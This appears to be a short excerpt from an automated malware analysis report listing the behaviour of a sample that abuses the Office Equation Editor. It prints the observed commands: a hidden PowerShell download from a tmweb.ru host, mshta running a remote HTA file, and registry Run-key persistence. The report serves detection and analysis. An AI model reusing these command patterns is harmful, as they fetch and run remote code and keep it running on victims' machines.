Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'WHSCPF' = 'powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://cn23428.tmweb...
- '%WINDIR%\syswow64\cmd.exe' /c mshta http://cn####8.tmweb.ru/WHSCPF.hta
- http://cn####8.tmweb.ru/WHSCPF.hta
- DNS ASK cn####8.tmweb.ru
- '%WINDIR%\syswow64\cmd.exe' /c mshta http://cn####8.tmweb.ru/WHSCPF.hta' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WHSCPF /t REG_SZ /d "powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://c...' (with hidden window)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\mshta.exe' http://cn####8.tmweb.ru/WHSCPF.hta
- '%WINDIR%\syswow64\reg.exe' ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WHSCPF /t REG_SZ /d "powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://c...